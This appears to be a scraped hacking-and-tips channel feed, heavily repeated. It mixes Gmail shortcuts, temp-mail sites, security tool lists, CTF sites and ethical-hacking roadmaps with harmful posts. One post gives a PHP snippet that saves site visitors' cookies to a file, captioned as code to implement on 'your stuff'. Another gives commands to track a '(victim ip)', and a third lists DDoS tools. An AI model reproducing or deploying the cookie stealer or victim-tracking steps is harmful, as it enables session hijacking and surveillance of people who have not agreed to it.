⭕️ G-Mail keyboard shortcuts ⭕️
#pc_feature #OldPost
Here is the complete list of Gmail keyboard shortcuts:
Compose and Chat
<Shift> + <Esc> : Focus main window
<Esc> : Focus latest chat or compose
<Ctrl> + . : Advance to next chat or compose
<Ctrl> + , : Advance to previous chat or compose
<Ctrl> + <Enter> : Send
<Ctrl> + <Shift> + c : Add cc recipients
<Ctrl> + <Shift> + b : Add bcc recipients
<Ctrl> + <Shift> + f : Access custom from
<Ctrl> + k : Insert a link
<Ctrl> + ; : Go to previous misspelled word
<Ctrl> + ' : Go to next misspelled word
<Ctrl> + m : Open spelling suggestions
Formatting
<Ctrl> + <Shift> + 5 : Previous font
<Ctrl> + <Shift> + 6 : Next font
<Ctrl> + <Shift> + - : Decrease text size
<Ctrl> + <Shift> + + : Increase text size
<Ctrl> + b : Bold
<Ctrl> + i : Italics
<Ctrl> + u : Underline
<Ctrl> + <Shift> + 7 : Numbered list
<Ctrl> + <Shift> + 8 : Bulleted list
<Ctrl> + <Shift> + 9 : Quote
<Ctrl> + [ : Indent less
<Ctrl> + ] : Indent more
<Ctrl> + <Shift> + l : Align left
<Ctrl> + <Shift> + e : Align center
<Ctrl> + <Shift> + r : Align right
<Ctrl> + <Shift> + , : Set right-to-left
<Ctrl> + <Shift> + . : Set left-to-right
<Ctrl> + \ : Remove formatting
Jumping
g then i : Go to Inbox
g then s : Go to Starred conversations
g then t : Go to Sent messages
g then d : Go to Drafts
g then a : Go to All mail
g then c : Go to Contacts
g then k : Go to Tasks
g then l : Go to Label
Threadlist selection
* then a : Select all conversations
* then n : Deselect all conversations
* then r : Select read conversations
* then u : Select unread conversations
* then s : Select starred conversations
* then t : Select unstarred conversations
Navigation
u : Back to threadlist
k / j : Newer/older conversation
o or <Enter> : Open conversation; collapse/expand conversation
p / n : Read previous/next message
` : Go to next inbox section
~ : Go to previous inbox section
Application
c : Compose
d : Compose in a tab (new compose only)
/ : Search mail
q : Search chat contacts
. : Open "more actions" menu
v : Open "move to" menu
l : Open "label as" menu
? : Open keyboard shortcut help
Actions
, : Move focus to toolbar
x : Select conversation
s : Rotate superstar
y : Remove label
e : Archive
m : Mute conversation
! : Report as spam
# : Delete
r : Reply
<Shift> + r : Reply in a new window
a : Reply all
<Shift> + a : Reply all in a new window
f : Forward
<Shift> + f : Forward in a new window
<Shift> + n : Update conversation
] / [ : Remove conversation from current view and go previous/next
} / { : Archive conversation and go previous/next
z : Undo last action
<Shift> + i : Mark as read
<Shift> + u : Mark as unread
_ : Mark unread from the selected message
+ or = : Mark as important
- : Mark as not important
<Shift> + t : Add conversation to Tasks
#pc_feature #OldPost
Here is the complete list of Gmail keyboard shortcuts:
Compose and Chat
<Shift> + <Esc> : Focus main window
<Esc> : Focus latest chat or compose
<Ctrl> + . : Advance to next chat or compose
<Ctrl> + , : Advance to previous chat or compose
<Ctrl> + <Enter> : Send
<Ctrl> + <Shift> + c : Add cc recipients
<Ctrl> + <Shift> + b : Add bcc recipients
<Ctrl> + <Shift> + f : Access custom from
<Ctrl> + k : Insert a link
<Ctrl> + ; : Go to previous misspelled word
<Ctrl> + ' : Go to next misspelled word
<Ctrl> + m : Open spelling suggestions
Formatting
<Ctrl> + <Shift> + 5 : Previous font
<Ctrl> + <Shift> + 6 : Next font
<Ctrl> + <Shift> + - : Decrease text size
<Ctrl> + <Shift> + + : Increase text size
<Ctrl> + b : Bold
<Ctrl> + i : Italics
<Ctrl> + u : Underline
<Ctrl> + <Shift> + 7 : Numbered list
<Ctrl> + <Shift> + 8 : Bulleted list
<Ctrl> + <Shift> + 9 : Quote
<Ctrl> + [ : Indent less
<Ctrl> + ] : Indent more
<Ctrl> + <Shift> + l : Align left
<Ctrl> + <Shift> + e : Align center
<Ctrl> + <Shift> + r : Align right
<Ctrl> + <Shift> + , : Set right-to-left
<Ctrl> + <Shift> + . : Set left-to-right
<Ctrl> + \ : Remove formatting
Jumping
g then i : Go to Inbox
g then s : Go to Starred conversations
g then t : Go to Sent messages
g then d : Go to Drafts
g then a : Go to All mail
g then c : Go to Contacts
g then k : Go to Tasks
g then l : Go to Label
Threadlist selection
* then a : Select all conversations
* then n : Deselect all conversations
* then r : Select read conversations
* then u : Select unread conversations
* then s : Select starred conversations
* then t : Select unstarred conversations
Navigation
u : Back to threadlist
k / j : Newer/older conversation
o or <Enter> : Open conversation; collapse/expand conversation
p / n : Read previous/next message
` : Go to next inbox section
~ : Go to previous inbox section
Application
c : Compose
d : Compose in a tab (new compose only)
/ : Search mail
q : Search chat contacts
. : Open "more actions" menu
v : Open "move to" menu
l : Open "label as" menu
? : Open keyboard shortcut help
Actions
, : Move focus to toolbar
x : Select conversation
s : Rotate superstar
y : Remove label
e : Archive
m : Mute conversation
! : Report as spam
# : Delete
r : Reply
<Shift> + r : Reply in a new window
a : Reply all
<Shift> + a : Reply all in a new window
f : Forward
<Shift> + f : Forward in a new window
<Shift> + n : Update conversation
] / [ : Remove conversation from current view and go previous/next
} / { : Archive conversation and go previous/next
z : Undo last action
<Shift> + i : Mark as read
<Shift> + u : Mark as unread
_ : Mark unread from the selected message
+ or = : Mark as important
- : Mark as not important
<Shift> + t : Add conversation to Tasks
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List of disposable mail services
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▪️Gmailnators▪️
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▪️Domain Com▪️
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https://tempmail.run/
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https://temp-mailbox.com/10minutemail/
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https://emailnator.com/
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▪️Domain Com▪️
https://inboxes.com/
✖️Domain Regular✖️
https://etempmail.net/10minutemail
https://cloudtempmail.com/en
https://www.10minuteemails.com/mailbox
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https://1secmail.ru/
https://tempmail.run/
https://email10min.net/
https://www.temporary-email.org/
https://mailtemp.net/
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🔰How Do I Protect My Computer From Bots?🔰
🤖It’s Very Possible To Protect Your Computer From Bots, But it Takes Diligence And Knowing What To Look For. Use The Following Tips To Keep Your Computer Safe:
🌀Install Firewalls To Block Malicious Attacks And Never Turn Them Off.
🌀Use A Long And Complicated Password That Contains Numbers And Symbols.
🌀Never Use The Same Password For Multiple Programs.
🌀Install Quality Anti-Malware Software Such As Norton security to protect your device.
🌀Ensure Software Is Up To Date, And Never Ignore System Updates.
🌀Refrain From Using Flash Drives, Or Thumb Drives, In An Infected Computer.
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🤖It’s Very Possible To Protect Your Computer From Bots, But it Takes Diligence And Knowing What To Look For. Use The Following Tips To Keep Your Computer Safe:
🌀Install Firewalls To Block Malicious Attacks And Never Turn Them Off.
🌀Use A Long And Complicated Password That Contains Numbers And Symbols.
🌀Never Use The Same Password For Multiple Programs.
🌀Install Quality Anti-Malware Software Such As Norton security to protect your device.
🌀Ensure Software Is Up To Date, And Never Ignore System Updates.
🌀Refrain From Using Flash Drives, Or Thumb Drives, In An Infected Computer.
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🔰7 Best Hacking Tools Everyone Must Know🔰
1. Nmap
It is a free and open-source tool that is used for network discovery and security auditing.
2. Metasploit
It is basically a Security Assessment and Penetration Testing tool. Metasploit can be used to launch an attack on other systems with it.
3. Angry IP Scanner
It is one of the fastest IP addresses and port scanner. By using this hacker can easily gather information about open ports in the target system.
4. Nikto
It is a webserver assessment tool. Nikto is an open-source platform that performs tests against Web Servers to find various vulnerable files, misconfigurations, outdated servers and programs on that web server.
5. John the Ripper
JTR is free and open-source software that is widely used by hackers for password cracking. It uses the various cryptanalysis attacks such as “Dictionary Attack” and “Brute-Force Attack”.
6. Wireshark:
It is an open-source tool that is used to capture traffic on the network. It is basically a network protocol analyzer tool.
7. Burp Suite:
It is an integrated platform that is used for performing a test on web application security.
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1. Nmap
It is a free and open-source tool that is used for network discovery and security auditing.
2. Metasploit
It is basically a Security Assessment and Penetration Testing tool. Metasploit can be used to launch an attack on other systems with it.
3. Angry IP Scanner
It is one of the fastest IP addresses and port scanner. By using this hacker can easily gather information about open ports in the target system.
4. Nikto
It is a webserver assessment tool. Nikto is an open-source platform that performs tests against Web Servers to find various vulnerable files, misconfigurations, outdated servers and programs on that web server.
5. John the Ripper
JTR is free and open-source software that is widely used by hackers for password cracking. It uses the various cryptanalysis attacks such as “Dictionary Attack” and “Brute-Force Attack”.
6. Wireshark:
It is an open-source tool that is used to capture traffic on the network. It is basically a network protocol analyzer tool.
7. Burp Suite:
It is an integrated platform that is used for performing a test on web application security.
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TUTORIAL : How To Change Your IP Address
ʏᴏᴜ ᴄᴏᴜʟᴅ ᴅᴏ ᴛʜɪs ʟᴇss ᴛʜᴀɴ ᴀ ᴍɪɴᴜᴛᴇ
𝗚𝘂𝗶𝗱𝗲 -
Click on "Start" in the bottom left hand corner of 𝘀𝗰𝗿𝗲𝗲𝗻
Click on "Run"
Type in "command" and hit ok
You should now be at an MSDOS prompt screen.
Type "ipconfig /release" just like that, and hit "enter"
Type "exit" and leave the prompt
• Right-click on "Network Places" or "My Network Places" on your desktop.
Click on "properties" You should now be on a screen with something noscriptd "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.
Right click on "Local Area Connection" and click "properties"
Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" 𝘁𝗮𝗯
Click on "Use the following IP address" under the "General" 𝘁𝗮𝗯
Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
Hit the "Ok" button 𝗵𝗲𝗿𝗲
Hit the "Ok" button again You should now be back to the "Local Area Connection" screen.
Right-click back on "Local Area Connection" and go to properties again.
Go back to the "TCP/IP" 𝘀𝗲𝘁𝘁𝗶𝗻𝗴𝘀
This time, select "Obtain an IP address automatically" tongue.gif
18. Hit "Ok"
Hit "Ok" 𝗮𝗴𝗮𝗶𝗻
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𝗚𝘂𝗶𝗱𝗲 -
Click on "Start" in the bottom left hand corner of 𝘀𝗰𝗿𝗲𝗲𝗻
Click on "Run"
Type in "command" and hit ok
You should now be at an MSDOS prompt screen.
Type "ipconfig /release" just like that, and hit "enter"
Type "exit" and leave the prompt
• Right-click on "Network Places" or "My Network Places" on your desktop.
Click on "properties" You should now be on a screen with something noscriptd "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.
Right click on "Local Area Connection" and click "properties"
Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" 𝘁𝗮𝗯
Click on "Use the following IP address" under the "General" 𝘁𝗮𝗯
Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
Hit the "Ok" button 𝗵𝗲𝗿𝗲
Hit the "Ok" button again You should now be back to the "Local Area Connection" screen.
Right-click back on "Local Area Connection" and go to properties again.
Go back to the "TCP/IP" 𝘀𝗲𝘁𝘁𝗶𝗻𝗴𝘀
This time, select "Obtain an IP address automatically" tongue.gif
18. Hit "Ok"
Hit "Ok" 𝗮𝗴𝗮𝗶𝗻
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❇️Shut Down your ANDROID Device by Making Call from Another Phone (like a pro)
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🔹Step 1: First of all, download and install the Automateit app. This app needs root access. So, make sure to grant the root permission.
🔹Step 2: Next, select ‘My Rules’ and tap on the (+) icon.
🔹Step 3: In the next screen tap on the ‘Call State Trigger’
🔹Step 4: Now, choose the option ‘Incoming Call’
🔹Step 5; In the next step, select the contact. You can choose from saved contacts or can create a new one.
🔹Step 6: Now tap on ‘Next’ and on the next screen, select ‘Shutdown Device Action’
🔹Step 7: Now you need to provide the name for the rule and save the rule.
Now you just need to make a call from the contact you specified and your Android device will be shut down.
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🔹Step 1: First of all, download and install the Automateit app. This app needs root access. So, make sure to grant the root permission.
🔹Step 2: Next, select ‘My Rules’ and tap on the (+) icon.
🔹Step 3: In the next screen tap on the ‘Call State Trigger’
🔹Step 4: Now, choose the option ‘Incoming Call’
🔹Step 5; In the next step, select the contact. You can choose from saved contacts or can create a new one.
🔹Step 6: Now tap on ‘Next’ and on the next screen, select ‘Shutdown Device Action’
🔹Step 7: Now you need to provide the name for the rule and save the rule.
Now you just need to make a call from the contact you specified and your Android device will be shut down.
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Track Location With Live Address And City in Termux
IpHack: is a tracking tool for both IP location and tracking testing.
Installation ~
Enjoy 🤟
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IpHack: is a tracking tool for both IP location and tracking testing.
Installation ~
apt update && apt upgradeapt install gitgit clone https://github.com/mishakorzik/IpHackcd IpHackbash setup.shchmod +x *cd IpHackpython IpHack.py -t (victim ip)Enjoy 🤟
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🔰 Best Websites To Test Your Hacking Skills 🔰
https://pwnable.kr/
https://hack.me/
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https://google-gruyere.appspot.com/
https://www.root-me.org/en/
https://www.hackthebox.eu/
https://www.hacking-lab.com/
http://www.gameofhacks.com/
https://overthewire.org/
https://microcorruption.com/
https://xss-game.appspot.com/?utm_source...dium=email
https://crackmes.one/
https://pentest.training/
https://www.hellboundhackers.org/
http://hax.tor.hu/
https://thisislegal.com/
https://tryhackme.com
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https://hack.me/
https://ctflearn.com/
https://google-gruyere.appspot.com/
https://www.root-me.org/en/
https://www.hackthebox.eu/
https://www.hacking-lab.com/
http://www.gameofhacks.com/
https://overthewire.org/
https://microcorruption.com/
https://xss-game.appspot.com/?utm_source...dium=email
https://crackmes.one/
https://pentest.training/
https://www.hellboundhackers.org/
http://hax.tor.hu/
https://thisislegal.com/
https://tryhackme.com
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#lifehack
How to always run Google Chrome in incognito mode in Windows 10
If you want to use "Incognito" mode in Google Chrome browser by default, you can set it to start in that mode right away.
1. Right-click on the Chrome shortcut and select "Properties".
3. On the "Shortcut" tab, find the "Object" text box. It will contain the following:
"C:Program Files (x86)GoogleChromeApplicationchrome.exe".
4. modify the content of the "Object" field by adding "-incognito" at the end, separated by a space.
5. Click on "Apply".
The next time you open Chrome using this shortcut, it will automatically launch in "Incognito" mode.
How to always run Google Chrome in incognito mode in Windows 10
If you want to use "Incognito" mode in Google Chrome browser by default, you can set it to start in that mode right away.
1. Right-click on the Chrome shortcut and select "Properties".
3. On the "Shortcut" tab, find the "Object" text box. It will contain the following:
"C:Program Files (x86)GoogleChromeApplicationchrome.exe".
4. modify the content of the "Object" field by adding "-incognito" at the end, separated by a space.
5. Click on "Apply".
The next time you open Chrome using this shortcut, it will automatically launch in "Incognito" mode.
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✨COOKIE STEALING CODE IN PHP STORES ON CPANEL✨
<?php
// Steal the user's cookies
if (isset($_COOKIE['user'])) {
//store in file
$cookie = json_encode($_COOKIE['user']);
$filename = 'stolen_cookies_' . date('m_d_Y') . '.txt';
file_put_contents('/filemanager/'. $filename, $cookie);
}
?>
⚠️USE YOUR BRAIN NOW TO IMPLEMENT ON YOUR STUFF 😈
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<?php
// Steal the user's cookies
if (isset($_COOKIE['user'])) {
//store in file
$cookie = json_encode($_COOKIE['user']);
$filename = 'stolen_cookies_' . date('m_d_Y') . '.txt';
file_put_contents('/filemanager/'. $filename, $cookie);
}
?>
⚠️USE YOUR BRAIN NOW TO IMPLEMENT ON YOUR STUFF 😈
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🔰How Do I Protect My Computer From Bots?🔰
🤖It’s Very Possible To Protect Your Computer From Bots, But it Takes Diligence And Knowing What To Look For. Use The Following Tips To Keep Your Computer Safe:
🌀Install Firewalls To Block Malicious Attacks And Never Turn Them Off.
🌀Use A Long And Complicated Password That Contains Numbers And Symbols.
🌀Never Use The Same Password For Multiple Programs.
🌀Install Quality Anti-Malware Software Such As Norton security to protect your device.
🌀Ensure Software Is Up To Date, And Never Ignore System Updates.
🌀Refrain From Using Flash Drives, Or Thumb Drives, In An Infected Computer.
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🤖It’s Very Possible To Protect Your Computer From Bots, But it Takes Diligence And Knowing What To Look For. Use The Following Tips To Keep Your Computer Safe:
🌀Install Firewalls To Block Malicious Attacks And Never Turn Them Off.
🌀Use A Long And Complicated Password That Contains Numbers And Symbols.
🌀Never Use The Same Password For Multiple Programs.
🌀Install Quality Anti-Malware Software Such As Norton security to protect your device.
🌀Ensure Software Is Up To Date, And Never Ignore System Updates.
🌀Refrain From Using Flash Drives, Or Thumb Drives, In An Infected Computer.
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🖥 100 Web Vulnerabilities, categorized into various types : 😀
⚡️ Injection Vulnerabilities:
⚡️ Broken Authentication and Session Management:
⚡️ Sensitive Data Exposure:
⚡️ Security Misconfiguration:
⚡️ XML-Related Vulnerabilities:
⚡️ Broken Access Control:
⚡️ Insecure Deserialization:
⚡️ API Security Issues:
⚡️ Insecure Communication:
⚡️ Client-Side Vulnerabilities:
⚡️ Denial of Service (DoS):
⚡️ Other Web Vulnerabilities:
⚡️ Mobile Web Vulnerabilities:
⚡️ IoT Web Vulnerabilities:
⚡️ Web of Things (WoT) Vulnerabilities:
⚡️ Authentication Bypass:
⚡️ Server-Side Request Forgery (SSRF):
⚡️ Content Spoofing:
⚡️ Business Logic Flaws:
⚡️ Zero-Day Vulnerabilities:
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⚡️ Injection Vulnerabilities:
1. SQL Injection (SQLi)
2. Cross-Site Scripting (XSS)
3. Cross-Site Request Forgery (CSRF)
4. Remote Code Execution (RCE)
5. Command Injection
6. XML Injection
7. LDAP Injection
8. XPath Injection
9. HTML Injection
10. Server-Side Includes (SSI) Injection
11. OS Command Injection
12. Blind SQL Injection
13. Server-Side Template Injection (SSTI)
⚡️ Broken Authentication and Session Management:
14. Session Fixation
15. Brute Force Attack
16. Session Hijacking
17. Password Cracking
18. Weak Password Storage
19. Insecure Authentication
20. Cookie Theft
21. Credential Reuse
⚡️ Sensitive Data Exposure:
22. Inadequate Encryption
23. Insecure Direct Object References (IDOR)
24. Data Leakage
25. Unencrypted Data Storage
26. Missing Security Headers
27. Insecure File Handling
⚡️ Security Misconfiguration:
28. Default Passwords
29. Directory Listing
30. Unprotected API Endpoints
31. Open Ports and Services
32. Improper Access Controls
33. Information Disclosure
34. Unpatched Software
35. Misconfigured CORS
36. HTTP Security Headers Misconfiguration
⚡️ XML-Related Vulnerabilities:
37. XML External Entity (XXE) Injection
38. XML Entity Expansion (XEE)
39. XML Bomb
⚡️ Broken Access Control:
40. Inadequate Authorization
41. Privilege Escalation
42. Insecure Direct Object References
43. Forceful Browsing
44. Missing Function-Level Access Control
⚡️ Insecure Deserialization:
45. Remote Code Execution via Deserialization
46. Data Tampering
47. Object Injection
⚡️ API Security Issues:
48. Insecure API Endpoints
49. API Key Exposure
50. Lack of Rate Limiting
51. Inadequate Input Validation
⚡️ Insecure Communication:
52. Man-in-the-Middle (MITM) Attack
53. Insufficient Transport Layer Security
54. Insecure SSL/TLS Configuration
55. Insecure Communication Protocols
⚡️ Client-Side Vulnerabilities:
56. DOM-based XSS
57. Insecure Cross-Origin Communication
58. Browser Cache Poisoning
59. Clickjacking
60. HTML5 Security Issues
⚡️ Denial of Service (DoS):
61. Distributed Denial of Service (DDoS)
62. Application Layer DoS
63. Resource Exhaustion
64. Slowloris Attack
65. XML Denial of Service
⚡️ Other Web Vulnerabilities:
66. Server-Side Request Forgery (SSRF)
67. HTTP Parameter Pollution (HPP)
68. Insecure Redirects and Forwards
69. File Inclusion Vulnerabilities
70. Security Header Bypass
71. Clickjacking
72. Inadequate Session Timeout
73. Insufficient Logging and Monitoring
74. Business Logic Vulnerabilities
75. API Abuse
⚡️ Mobile Web Vulnerabilities:
76. Insecure Data Storage on Mobile Devices
77. Insecure Data Transmission on Mobile Devices
78. Insecure Mobile API Endpoints
79. Mobile App Reverse Engineering
⚡️ IoT Web Vulnerabilities:
80. Insecure IoT Device Management
81. Weak Authentication on IoT Devices
82. IoT Device Vulnerabilities
⚡️ Web of Things (WoT) Vulnerabilities:
83. Unauthorized Access to Smart Homes
84. IoT Data Privacy Issues
⚡️ Authentication Bypass:
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#Reverse_Engeenering
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#Information_Gathering
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11-Reverse Engeenering
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#DDoS
1-MDK3
2-LOIC
3-HULK
4-DDOSIM
5-Ufonet
6-Hping3
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9-Slowloris
10-Websploit
11-GoldenEye
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1-COFEE
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#Programming
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#Phone_Hacking
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5-Metasploit
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#Network_Hacking
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#Wireless_Hacking
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5-WiFi Pumpkin
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7-Fluxion
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#Reverse_Engeenering
1-OWASP-ZSC
2-OllyDBG
3-Apktool
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Here are 27 ways to learn ethical hacking for free:
1. Root Me — Challenges.
2. Stök's YouTube — Videos.
3. Hacker101 Videos — Videos.
4. InsiderPhD YouTube — Videos.
5. EchoCTF — Interactive Learning.
6. Vuln Machines — Videos and Labs.
7. Try2Hack — Interactive Learning.
8. Pentester Land — Written Content.
9. Checkmarx — Interactive Learning.
10. Cybrary — Written Content and Labs.
11. RangeForce — Interactive Exercises.
12. Vuln Hub — Written Content and Labs.
13. TCM Security — Interactive Learning.
14. HackXpert — Written Content and Labs.
15. Try Hack Me — Written Content and Labs.
16. OverTheWire — Written Content and Labs.
17. Hack The Box — Written Content and Labs.
18. CyberSecLabs — Written Content and Labs.
19. Pentester Academy — Written Content and Labs.
20. Bug Bounty Reports Explained YouTube — Videos.
21. Web Security Academy — Written Content and Labs.
22. Securibee's Infosec Resources — Written Content.
23. Jhaddix Bug Bounty Repository — Written Content.
24. Zseano's Free Bug Bounty Methodology — Free Ebook.
25. Awesome AppSec GitHub Repository — Written Content.
26. NahamSec's Bug Bounty Beginner Repository — Written Content.
27. Kontra Application Security Training — Interactive Learning.
1. Root Me — Challenges.
2. Stök's YouTube — Videos.
3. Hacker101 Videos — Videos.
4. InsiderPhD YouTube — Videos.
5. EchoCTF — Interactive Learning.
6. Vuln Machines — Videos and Labs.
7. Try2Hack — Interactive Learning.
8. Pentester Land — Written Content.
9. Checkmarx — Interactive Learning.
10. Cybrary — Written Content and Labs.
11. RangeForce — Interactive Exercises.
12. Vuln Hub — Written Content and Labs.
13. TCM Security — Interactive Learning.
14. HackXpert — Written Content and Labs.
15. Try Hack Me — Written Content and Labs.
16. OverTheWire — Written Content and Labs.
17. Hack The Box — Written Content and Labs.
18. CyberSecLabs — Written Content and Labs.
19. Pentester Academy — Written Content and Labs.
20. Bug Bounty Reports Explained YouTube — Videos.
21. Web Security Academy — Written Content and Labs.
22. Securibee's Infosec Resources — Written Content.
23. Jhaddix Bug Bounty Repository — Written Content.
24. Zseano's Free Bug Bounty Methodology — Free Ebook.
25. Awesome AppSec GitHub Repository — Written Content.
26. NahamSec's Bug Bounty Beginner Repository — Written Content.
27. Kontra Application Security Training — Interactive Learning.
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How to Become Ethical Hacker In 2024
1. Develop a Strong Foundation in Computer Science and Programming:
Master a programming language like Python, Java, or C++. These languages are widely used in cybersecurity tools and noscripts.
Understand computer networking concepts like TCP/IP, network protocols, and routing mechanisms.
Familiarize yourself with operating systems, including Linux, Windows, and macOS, as you'll be interacting with various systems during ethical hacking.
2. Learn Cybersecurity Fundamentals:
Grasp the principles of cryptography, encryption techniques, and hashing algorithms.
Understand vulnerability assessment and penetration testing (VAPT) methodologies.
Familiarize yourself with common security threats, attack vectors, and exploit techniques.
Explore web application security concepts, including SQL injection, cross-site noscripting (XSS), and cross-site request forgery (CSRF).
3. Enroll in Ethical Hacking Courses and Certifications:
Consider pursuing certifications like Certified Ethical Hacker (CEH) or CompTIA Penetration Testing+ (PT+) to validate your skills and knowledge.
Participate in online courses or bootcamps offered by reputable institutions to gain hands-on experience and practical skills.
Engage in virtual labs and Capture the Flag (CTF) competitions to test your skills and practice ethical hacking techniques.
4. Join Online Communities and Engage with Experts:
Engage in online forums, discussion groups, and communities dedicated to ethical hacking.
Connect with experienced hackers and cybersecurity professionals to seek guidance and mentorship.
Participate in workshops, conferences, and networking events to expand your knowledge and connections.
5. Contribute to Open-Source Projects and Build a Portfolio:
Contribute to open-source security projects to gain real-world experience and demonstrate your skills.
Participate in bug bounty programs to identify and report vulnerabilities in various systems.
Build a personal portfolio showcasing your ethical hacking projects, certifications, and contributions.
6. Stay Updated with the Latest Cybersecurity Trends:
Continuously read industry news, blogs, and research papers to keep abreast of emerging threats and vulnerabilities.
Participate in online webinars, workshops, and training sessions to stay updated on the latest hacking techniques and tools.
Attend cybersecurity conferences and events to network with experts and learn about cutting-edge technologies.
1. Develop a Strong Foundation in Computer Science and Programming:
Master a programming language like Python, Java, or C++. These languages are widely used in cybersecurity tools and noscripts.
Understand computer networking concepts like TCP/IP, network protocols, and routing mechanisms.
Familiarize yourself with operating systems, including Linux, Windows, and macOS, as you'll be interacting with various systems during ethical hacking.
2. Learn Cybersecurity Fundamentals:
Grasp the principles of cryptography, encryption techniques, and hashing algorithms.
Understand vulnerability assessment and penetration testing (VAPT) methodologies.
Familiarize yourself with common security threats, attack vectors, and exploit techniques.
Explore web application security concepts, including SQL injection, cross-site noscripting (XSS), and cross-site request forgery (CSRF).
3. Enroll in Ethical Hacking Courses and Certifications:
Consider pursuing certifications like Certified Ethical Hacker (CEH) or CompTIA Penetration Testing+ (PT+) to validate your skills and knowledge.
Participate in online courses or bootcamps offered by reputable institutions to gain hands-on experience and practical skills.
Engage in virtual labs and Capture the Flag (CTF) competitions to test your skills and practice ethical hacking techniques.
4. Join Online Communities and Engage with Experts:
Engage in online forums, discussion groups, and communities dedicated to ethical hacking.
Connect with experienced hackers and cybersecurity professionals to seek guidance and mentorship.
Participate in workshops, conferences, and networking events to expand your knowledge and connections.
5. Contribute to Open-Source Projects and Build a Portfolio:
Contribute to open-source security projects to gain real-world experience and demonstrate your skills.
Participate in bug bounty programs to identify and report vulnerabilities in various systems.
Build a personal portfolio showcasing your ethical hacking projects, certifications, and contributions.
6. Stay Updated with the Latest Cybersecurity Trends:
Continuously read industry news, blogs, and research papers to keep abreast of emerging threats and vulnerabilities.
Participate in online webinars, workshops, and training sessions to stay updated on the latest hacking techniques and tools.
Attend cybersecurity conferences and events to network with experts and learn about cutting-edge technologies.
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1. Web Developer-Roadmap : https://github.com/kamranahmedse/developer-roadmap
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4. CSS-Protips : https://github.com/AllThingsSmitty/css-protips
5. 33-JS-Concepts : https://github.com/leonardomso/33-js-concepts
6. You-Dont-Know-JS : https://github.com/getify/You-Dont-Know-JS/tree/2nd-ed
7. Front-End-Checklist : https://github.com/thedaviddias/Front-End-Checklist
8. Javanoscript-Questions : https://github.com/lydiahallie/javanoscript-questions
9. Clean-Code-Javanoscript : https://github.com/ryanmcdermott/clean-code-javanoscript
10. free-programming-books : https://github.com/EbookFoundation/free-programming-books
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Day 1-3: Introduction to Ethical Hacking
- Understand the basics of ethical hacking and its importance
- Learn about different types of hackers and their motivations
- Explore the legal and ethical considerations of ethical hacking
Day 4-7: Networking Fundamentals
- Learn about networking protocols, IP addresses, and subnets
- Understand how data is transmitted over networks
- Explore common network vulnerabilities and how to secure them
Day 8-10: Information Gathering and Footprinting
- Learn how to gather information about a target system or network
- Explore techniques such as passive information gathering and footprinting
- Understand the importance of reconnaissance in ethical hacking
Day 11-14: Scanning and Enumeration
- Learn how to scan for open ports and services on a target system
- Understand the concept of enumeration and its role in ethical hacking
- Explore tools such as Nmap for scanning and enumeration
Day 15-17: Vulnerability Assessment and Exploitation
- Learn how to identify and assess vulnerabilities in a target system
- Understand common exploitation techniques and tools used in ethical hacking
- Explore how to exploit vulnerabilities responsibly and ethically
Day 18-21: Web Application Security
- Learn about common web application vulnerabilities (e.g., SQL injection, XSS)
- Understand how to secure web applications against attacks
- Explore tools such as Burp Suite for web application testing
Day 22-24: Wireless Network Security
- Learn about common wireless network vulnerabilities and attacks
- Understand how to secure wireless networks against intruders
- Explore tools such as Aircrack-ng for wireless network penetration testing
Day 25-27: Social Engineering and Physical Security
- Learn about social engineering techniques used in ethical hacking
- Understand the importance of physical security in cybersecurity
- Explore ways to protect against social engineering attacks
Day 28-30: Penetration Testing and Reporting
- Learn how to conduct penetration tests on systems and networks
- Understand the methodology of penetration testing (e.g., reconnaissance, scanning, exploitation, reporting)
- Practice conducting penetration tests on virtual environments and create detailed reports on findings
Remember to practice your skills in a controlled environment and always seek permission before performing any ethical hacking activities. Additionally, consider obtaining relevant certifications such as Certified Ethical Hacker (CEH) to validate your skills in ethical hacking.
Some good resources to learn Ethical Hacking
1. Tutorials & Courses
- Informarion Security Free Course
- Ethical Hacking Bootcamp
- Network Hacking Course
2. Telegram Channels
- Cyber Security and Ethical Hacking
- Ethical Hacking Books
3. Books
- Ultimate Linux Free Book
- Python for Ethical Hacking
4. Ethical Hacking Forums
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ENJOY LEARNING 👨💻🔒
Day 1-3: Introduction to Ethical Hacking
- Understand the basics of ethical hacking and its importance
- Learn about different types of hackers and their motivations
- Explore the legal and ethical considerations of ethical hacking
Day 4-7: Networking Fundamentals
- Learn about networking protocols, IP addresses, and subnets
- Understand how data is transmitted over networks
- Explore common network vulnerabilities and how to secure them
Day 8-10: Information Gathering and Footprinting
- Learn how to gather information about a target system or network
- Explore techniques such as passive information gathering and footprinting
- Understand the importance of reconnaissance in ethical hacking
Day 11-14: Scanning and Enumeration
- Learn how to scan for open ports and services on a target system
- Understand the concept of enumeration and its role in ethical hacking
- Explore tools such as Nmap for scanning and enumeration
Day 15-17: Vulnerability Assessment and Exploitation
- Learn how to identify and assess vulnerabilities in a target system
- Understand common exploitation techniques and tools used in ethical hacking
- Explore how to exploit vulnerabilities responsibly and ethically
Day 18-21: Web Application Security
- Learn about common web application vulnerabilities (e.g., SQL injection, XSS)
- Understand how to secure web applications against attacks
- Explore tools such as Burp Suite for web application testing
Day 22-24: Wireless Network Security
- Learn about common wireless network vulnerabilities and attacks
- Understand how to secure wireless networks against intruders
- Explore tools such as Aircrack-ng for wireless network penetration testing
Day 25-27: Social Engineering and Physical Security
- Learn about social engineering techniques used in ethical hacking
- Understand the importance of physical security in cybersecurity
- Explore ways to protect against social engineering attacks
Day 28-30: Penetration Testing and Reporting
- Learn how to conduct penetration tests on systems and networks
- Understand the methodology of penetration testing (e.g., reconnaissance, scanning, exploitation, reporting)
- Practice conducting penetration tests on virtual environments and create detailed reports on findings
Remember to practice your skills in a controlled environment and always seek permission before performing any ethical hacking activities. Additionally, consider obtaining relevant certifications such as Certified Ethical Hacker (CEH) to validate your skills in ethical hacking.
Some good resources to learn Ethical Hacking
1. Tutorials & Courses
- Informarion Security Free Course
- Ethical Hacking Bootcamp
- Network Hacking Course
2. Telegram Channels
- Cyber Security and Ethical Hacking
- Ethical Hacking Books
3. Books
